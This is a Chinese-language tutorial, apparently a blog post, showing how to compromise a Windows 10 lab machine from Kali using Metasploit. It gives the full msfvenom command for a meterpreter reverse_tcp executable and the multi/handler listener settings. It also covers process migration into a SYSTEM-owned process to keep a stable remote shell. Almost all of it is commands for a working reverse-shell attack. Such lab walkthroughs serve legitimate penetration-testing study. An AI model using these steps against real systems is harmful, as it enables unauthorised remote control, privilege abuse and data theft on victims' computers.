Kali使用Metapsloit渗透win10 生成 payload 反弹shell

测试环境

攻击机kali:192.168.154.128

靶机win10:192.168.154.129

实操

1.kali中使用msfvenom生成一个payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=空闲可监听端口 -f exe -o /root/xxxx.exe

 文件生成在设置好的根目录下

 

2.将payload.exe放入目标windows靶机中

 

3.kali  启动msf

msfconsole

  

4. 使用handler侦听模块

use exploit/multi/handler  

 

5.在侦听模块中加入payload

set payload windows/meterpreter/reverse_tcp  

 6.set LHOST 攻击机IP   侦听主机

set lhost 192.168.154.128

7.set LPORT 攻击机开放的payload端口  

set lport 8888

  

8.show options   查看设置是否生效

show options

 

9.run或者exploit  开始侦听

 

10.windows端双击payload,反弹一个meterpreter的shell

 11.由于meterpreter的shell比较脆弱,所以要让他变成一个稳定的进程

getuid    #查看payld.exe的进程pid

 

ps     #看看所有进程,找一个有着system的进程 

 

12.将shell移动到PID为3356的taskhostw.exe的进程里

migrate 3356

 

 13.接下来就可以做一些操作,像查看系统信息,路由信息,arp信息等,还可以使用shell命令,获得windows的shell

 

 

 

  • 0
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值